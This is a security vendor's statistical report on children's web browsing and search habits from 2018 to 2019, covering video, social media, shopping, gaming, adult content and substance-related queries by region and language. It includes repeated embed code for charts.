Kaspersky Securelist

Syndikovat obsah Securelist
Aktualizace: 57 min 3 sek zpět

What kids get up to online

12 Červen, 2019 - 12:00

Today’s children navigate the Internet better than adults. They are not afraid to try out new technology, and are quick to grasp new trends and sometimes invent their own. New social networks, mobile games, music, and gadgets are all part and parcel of their daily lives. But just because they feel at home online does not mean that they need not pay attention to potential hazards. To help children avoid potential dangers in the digital world, parents must understand what their children are interested in, know about the latest online trends, and be aware of what might pose a risk.

How statistics are collected

Kaspersky Lab solutions scan the content of web pages that children try to access. If a particular site belongs to one of fourteen unwanted categories, the module sends a notification to the Kaspersky Security Network (there is no transfer of personal user data and no violation of privacy). There are two important things to note about this:

  • Parents decide for themselves what content should be blocked and configure the application accordingly. However, anonymous statistics are collected across all fourteen categories.
  • Data is harvested only from computers running Windows and Mac OS; no mobile statistics are provided in this report.
Website categorization

In products that have Parental Control features, web filtering is currently performed across the following categories:

Filtering search queries

Children’s search activity is the best indicator of their interests. Kaspersky Safe Kids can filter children’s queries in five different search engines (Bing, Google, Mail.ru, Yahoo!, Yandex) on six potentially dangerous topics: Adult Content, Alcohol, Tobacco, Drugs, Racism, and Profanity.

We have grouped the search queries by language. We consider statistics for the English language as international due to its prevalence. All searches in a specific language, minus repeat queries, were taken as the 100% reference value. The popularity of each topic – defined as the percentage of queries about it – is calculated for each separate language and for the entire world.

Search queries sent to us during the period May 2018 – May 2019 were broken down into several thematic categories:

  • Alcohol, Tobacco, Drugs
  • Anime
  • News
  • Memes
  • Celebrities
  • Sports
  • Education
  • Music
  • Online Communication
  • Shopping
  • Online Translators
  • Adult Content
  • Video Games
  • Video
Global picture Site categories

Over the past year, the global picture has changed quite radically.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of Parental Control and Safe Kids notifications across fourteen categories, May 2018 – May 2019 (download)

A few years ago, we noted a downward trend in the number of visits from PCs to sites in the Online Communication category, and this is continuing. Whereas last year, the share of this category was 59.68%, this year has seen a sharp drop, to 27.61%. At the same time, the share of the Software, Audio, Video category rose to 32.75% against 22.4% last year.

Electronic Commerce ranks third; compared with the data for 2017-2018, the popularity of online stores among children increased dramatically, from 2.83% to 14.18%. Children have started accessing news resources more frequently: Last year, this category accounted for slightly less than one percent, while this year’s figure stands at 8.78%.

The share of computer game-related sites was 3.01%, which is 1.98 p.p. lower than in the previous reporting period. Meanwhile, the share of adult content sites climbed to 2.08%, which is up 1.34 percentage points on last year (0.74%). The share of sites in the Alcohol, Tobacco, Drugs category collapsed, amounting to 0.64% (6.32% in the last reporting period).

Search queries

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of users’ search queries by thematic category, May 2018 – May 2019 (download)

Children most commonly search for movies and cartoons on YouTube. Compared to last year, the share of search queries related to video content remained practically the same at 17.91% (17.25% in 2017-2018).

Although children visited gaming sites less frequently, they have not lost interest in the topic; the share of game-related search queries actually increased by 10.84 percentage points to 16.93%. Interest also rose in adult content (from 8.59% to 14.90%) and online shopping (from 2.4% to 8.72%). Meanwhile, interest in online translators remains at the same level as last year: 13.69% in 2018-2019 against 13.58% in the previous reporting period.

The number of queries related to social networks and online communication fell by a couple of percentage points, from 9.88% to 7.27%. This year, children searched more often for music (5.80% in 2018-2019 vs. 3.78% in 2017-2018) and topics related to education (5.45% vs. 4.86%), but there was a decline in the number of searches for anime (from 0.79% to 0.70%) and sports (from 3.69% to 3.40%).

Differences by region, country, and language

To understand the reasons behind the changes, we shall examine each of the popular categories in more detail, and take a look at the changes in different regions and countries.

Software, Audio, Video

Most often, children visited sites – and searched for information – relating to the Software, Audio, Video category.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of the Software, Audio, Video category in different regions, May 2018 – May 2019 (download)

Children in Africa more than anywhere else visit sites from this category. Their favorites include youtube.com, dvdvideosoft.com, dropbox.com, and play.google.com.

We see a rise in interest in this category in all regions with the exception of the Commonwealth of Independent States (CIS), where a slight drop occurred. This was the first year that we included the regions of Africa and South Asia in the statistics, so a comparison with the previous year is not possible.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of the Software, Audio, Video category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

The largest growth in visits to sites with video, music, and software was observed in Arab countries: Their share of the total number of visited resources grew significantly from 8.70% to 42.57%. The most visited resources in this region are youtube.com, dvdvideosoft.com, play.google.com, and uptv.ir.

There was a marked increase in Latin America, too, from 12.60% to 32.54%. The most visited sites in this region are, of course, youtube.com along with play.google.com, dvdvideosoft.com, and spotify.com.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of the Software, Audio, Video category in different countries, May 2017 – May 2018 (download)

Kids in China spend more time than others watching videos and listening to music (69.36%). Last year, China also beat all other countries in this respect, but with a larger figure (78.76%).

Since this time, we expanded the list of countries, some of last year’s frontrunners, such as Germany and Russia, are now closer to the foot of the ranking, although their share of visits did not change all that much: Germany (34.05%) saw a 2.09 p.p. swing and Russia, (28.23%) 4.95 p.p.

In some countries, children’s time spent on listening to music and watching videos shot up. The figure grew exponentially in Saudi Arabia (from 0.38% to 51.34%), which could be related to the launch of Spotify in the region, Egypt (from 11.03% to 40.28%), Mexico (from 10.65% to 42.37%), the UAE (from 9.17% to 23.29%), and Brazil (from 13.53% to 27.44%). In all these countries, the most popular site in this category is youtube.com.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the Video topic in different languages, May 2018 – May 2019 (download)

As we have seen, the top topic in search queries around the world is video, which generally corresponds to the map of visited sites, where for the first time ever Software, Audio, Video has dislodged Online Communication as the leading category.

In the English language, the percentage of video-related search queries increased against last year from 20.54% to 28.35%. The most common searches were for “youtube,” “netflix,” and “amazon prime.” As in previous years, the most searched-for blogger is PewDiePie. The top cartoon channels are Nickelodeon, Disney, and Cartoon Network. There was also heightened interest in Game of Thrones.

The Video category’s share of searches among Chinese-speaking children this time around came to 21.12% (4.21% in the last reporting period). In Chinese, children searched for 愛奇藝 (iQiyi, the Chinese online video platform) and 復仇者聯盟4 (Avengers: Endgame).

Note that search queries in English reflect the interests not just of English-speaking children, but of all kids in general, since children worldwide often search for platforms, services, games, and social networks by their English names. In particular, the most popular site, as well as the most popular search query among children, is YouTube.

The graph below shows the percentage of YouTube-related search queries in different languages, with all other queries on the video topic (cartoons, movies, TV shows). In English, for example, 70.58% of all queries on the video topic are linked to YouTube. Only in China are children not interested in this video platform, since the service is blocked there.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of YouTube-related queries, and other searches on the video topic, May 2018 – May 2019 (download)

Another search topic in the Software, Audio, Video category is music. Compared to last year, children searched more often for songs, performers, and music videos. The sharpest hike in music-related queries came in the Japanese language, rising from 0.50% last year to 20.64% this year. This could be because Asian performers are wildly popular these days across the world, in particular the South Korean boy and girl bands BTS and BLACKPINK, and the Japanese virtual singer Hatsune Miku.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of thematic search queries on the music topic by language, May 2018 – May 2019 (download)

Besides music from Asia, children searched in English for the streaming service Spotify, singer Ariana Grande, rapper xxxtentacion (we wrote about him here), performer Marshmello, and singer Billie Eilish.

Online Communication

Each of our reports in recent years has noted a downward trend in children’s use of social networking sites and instant messengers on PCs. And now the day has come when the usual leader Online Communication has given way to video and music as the top category.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of the Internet Communication Media category in different regions, May 2018 – May 2019 (download)

Nevertheless, in our report’s new region, South Asia, children still communicate a lot online using desktops and laptops. In all other regions, we noticed a sharp drop in the number of visits. Facebook remains the most popular site in this category in practically all countries, with the exception of China.

Such a sharp drop in popularity can be put down to the craze among children and teenagers for the “mobile” social network TikTok (we wrote about it on our Kids Kaspersky portal, dedicated to keeping children safe). The steep decline could also be caused by the trend we have long observed for children to increasingly favor mobile over PC-based communication.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Internet Communication Media category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

Interestingly, as with the Software, Audio, Video category, the largest difference between the reporting periods is seen in Arab and Latin American countries.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Internet Communication Media category in different countries, May 2018 – May 2019 (download)

The country-specific data also shows a decline in visits to sites in the Online Communication category. This could be due to various factors, including the scandals around Facebook and VKontakte over the confidentiality of user data, as well as with the growing popularity of “mobile” social networks, such as Instagram, SnapChat, and TikTok.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the social networks topic in different languages, May 2018 – May 2019 (download)

As for search queries, Russian-speaking children most often searched for “ВК” (VK), “инстаграм” (instagram), and “скайп” (skype). Popular search queries in English were “facebook,” “instagram,” and “tiktok.” In Japanese, the most common searches were for stickers for the messenger Line. And in Arabic, they were for تويتر (Twitter) and Facebook.

Note that the share of search queries related to online communication decreased in most languages, as did visitor traffic to sites in this category. Their share in English decreased by 3.6 p.p. to 6.72%, and in Russian by 4.35 p.p. to 9.11% against the previous reporting period.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries related to one of the four most popular social networks, May 2018 – May 2019 (download)

Electronic Commerce

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Electronic Commerce category in different regions, May 2018 – May 2019 (download)

Another category of resources more popular this year than last is Electronic Commerce. The most popular sites are Aliexpress, Amazon, and eBay. Children’s interest in the online store Aliexpress is growing year on year. This report has already noted the upward trend in the popularity of services of Chinese origin; for example, the social network TikTok belongs to the Chinese Internet company ByteDance.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Electronic Commerce category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

The most significant rise in the popularity of online stores over the past year came in CIS countries. The Top 3 sites by number of visits are Avito, Aliexpress, and Wildberries.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Electronic Commerce category in different countries, May 2018 – May 2019 (download)

The country-specific data confirms that children in Belarus and Russia show most interest in online shopping.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the online shopping topic in different languages, May 2018 – May 2019 (download)

What exactly children were looking for is revealed in the search queries. In Japanese, the most frequent searches were for products from the Rakuten store and the Japanese version of Amazon, as well as candy from the 7-Eleven store. The most popular stores in German were Zalando, Saturn, eBay Kleinanzeigen, and Tiger; in English, Amazon, eBay, Aliexpress, Ikea, and Asos; and in Russian, Aliexpress, Авито (Avito), Юлу (Yulu), and Детский мир (Children’s World).

As for brands, in this reporting period children searched for Nike, Adidas, Samsung, Gucci, Vans, Supreme, Zara, and Bershka. Product-wise, the younger generation showed interest in the iPhone X, iPhone 7, Huawei p20, Samsung S7, Nike and Adidas footwear, and various books.

Video Games

Compared to last year, the share of this category decreased almost threefold. This does not mean that children are losing interest in games, since some of the content they watch on YouTube is devoted specifically to games, including walkthroughs, analysis, and reviews.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Share of websites in the Video Games category in different regions, May 2018 – May 2019 (download)

Not for the first year, the region with the largest gaming category share is Oceania. And this year we saw growth: from 11.03% to 13.63%. The most popular gaming sites in Oceania are roblox.com, blizzard.com, steamcommunity.com, ubisoft.com, and ea.com.

In North America, the share of visits to gaming sites from PCs dropped from 13.05% to 7.70%. The most popular sites in this region are roblox.com, blizzard.com, and twitch.tv.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Video Games category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

The share of this category decreased in other regions, too. For instance, it fell from 10.02% to 4.19% in Europe, from 3.96% to 1.24% in Latin America, and from 3.03% to 2.81% in the CIS. In others, meanwhile, it increased: from 1.49% to 2.04% in the Arab world, and from 2.93% to 4.71% in Asia.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Video Games category in different countries, May 2018 – May 2019 (download)

In the diagram, we see that in Australia (part of the Oceania region) the Video Games category has a greater share than in other countries (12.74%). It is followed by Germany (10.59%), which last year came mid-table, but this time ousted the UK (8.21%) from second place.

But the share of this category is still on a downward trend. This is likely due to the increased popularity of mobile games, which now attract children more than PC games. Overall, the mobile games market is growing year on year.

That said, PC games are still popular, although many of them have been adapted to mobile platforms and consoles. One example is Minecraft, which, judging by kids’ search queries, is still in high demand.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the Video Games topic in different languages, May 2018 – May 2019 (download)

Unsurprisingly, the lion’s share of game-related search queries are in English, since most games have English-language titles. The most popular queries in English this past year were: fortnite, roblox, minecraft, epic games (the publisher of Fortnite), steam, twitch, discord, overwatch, and pubg.

It is worth noting that many of the top search queries in English were related to Fortnite, for example: fortnite tracker, fortnite download, fortnite battle royale, and epic games fortnite.

Fortnite is available on almost all possible gaming platforms (Microsoft Windows, macOS, Xbox One, PlayStation 4, iOS, Android, Nintendo Switch). The gameplay originally consisted in studying the in-game map, collecting resources, building fortifications, and simply surviving (including defending yourself against night-time zombies). But then the developers released the multiplayer deathmatch mode Fortnite Battle Royale, which later turned into a full-fledged game and became even more of a hit than the original. The queries “fortnite mobile” and “fortnite android” confirm our suspicion that children are increasingly switching allegiance to mobile games.

In addition to PC and mobile games, children were interested in consoles. They searched for Nintendo Switch, PS4, Xbox, and Playstation.

Adult Content

Many people worry about the extent to which children are interested in pornography and erotica.

In terms of percentage of all website categories visited from PCs, the Adult Content category in the past reporting year accounted for 2.08%, up 1.34 p.p. on last year (0.74%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Share of websites in the Adult Content category in different regions, May 2018 – May 2019 (download)

The statistics by region show that the largest share of visits to adult sites belongs to Latin America (4.28%). In second place is South Asia (2.74%), with Asia in third place on 2.26%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Adult Content category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

Compared to last year, the share of adult sites in Latin America climbed from 0.63% to 4.28%. In the CIS, we also saw an increase: from 0.48% to 2.09%. The most popular resources in the Adult Content category, as previously, are pornhub.com, xnxx.com, and livejasmin.com. Interestingly, in some regions this category became less popular. For example, it fell from 1.18% to 0.84% in Europe.

This is not the first year that Asia has posted an increased interest in the topic of pornography and erotica. Interestingly, this year it declined from 2.72% to 2.26%, but still remained quite high compared to other regions.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Share of websites in the Adult Content category in different countries, May 2018 – May 2019 (download)

Children in Japan are the most likely to try to visit (or actually visit if there is no parental block) porn sites – 7.82% of all website categories accessed by children from PCs. In second place is Brazil (7.34%), where children also show interest in adult content. Third place goes to Mexico (5.45%). The high figures in these countries mean that Asia and Latin America are the world’s leading regions in this category.

The language with the largest share of all porn-related search queries is Portuguese.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries related to adult content in different languages, May 2018 – May 2019 (download)

In second place is Arabic, which last year accounted for the largest share of porn-related search queries (34.32%). Search queries in German came third.

Of interest here is not so much the sites that children visit from PCs, but the search queries they make; as we have noted in previous reports, children prefer viewing porn from mobile devices than PCs. Therefore, it would not be amiss to compare the search figures for the past two years:

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of Adult Content search queries in different languages, May 2017 – May 2018 and May 2018 – May 2019 (download)

Alcohol, Tobacco, Drugs

In the past two years, we have witnessed a downward trend in the number of visits by children worldwide to sites in the Alcohol, Tobacco, Drugs category.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Alcohol, Tobacco, Drugs category in different regions, May 2016 – May 2017, May 2017 – May 2018, and May 2018 – May 2019 (download)

Another reason for the decrease in the number of visits to sites in this category may be the loss of interest in electronic cigarettes and vapes. Whereas two or three years ago, vaping was all the rage, it is now a niche activity.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Alcohol, Tobacco, Drugs category in different regions, May 2018 – May 2019 (download)

All the same, children in North America and Oceania are the most likely to visit sites related to alcohol, tobacco, or drugs. But in Europe, the figure fell against previous years. Interestingly, despite the regional figures, the share of visits to alcohol-, tobacco-, and drug-related sites in Japan (2.21%) is higher than in other countries. The US is in second place (1.59%), and Germany is in third (1.00%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Alcohol, Tobacco, Drugs category in different countries, May 2018 – May 2019 (download)

We cannot say for sure that children intentionally visit sites with such content, since the search queries that best reflect kids’ interest in the subject do not reveal any increase in such interest.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the Alcohol, Tobacco, Drugs topic in different languages, May 2018 – May 2019 (download)

That said, in Chinese, children searched for 酒, 毒品 (alcohol, drugs); in German, “rauchen” (smoking), “bier” (beer), and “zigaretten” (cigarettes); in Portuguese, “maconha” (marijuana) and “caipirinha” (a Brazilian cocktail); and in Russian, “наркотики” (drugs), “алкоголь” (alcohol), and “сигареты” (cigarettes).

Other

Besides the categories examined in this report, our investigation of search queries revealed other topics of interest to kids. For instance, search queries related to online translators are among the most popular.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries related to the topic of online translation in different languages, May 2018 – May 2019 (download)

In French, children searched for “traduction francais anglais” and “traduction espagnol français”; in Spanish, “traductor español ingles” and “traductor español frances”; in Italian, “traduttore inglese italiano” and “traduttore francese italiano”; and in German, “google übersetzer” and “englisch deutsch”.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of sports-related search queries in different languages, May 2018 – May 2019 (download)

Portuguese-speaking children showed most interest in the topic of sport. Their search queries included Brazilian soccer stars and match results. Sports were also of great interest to children in the Arab world and Spanish-speaking countries. The vast majority of queries were soccer-related.

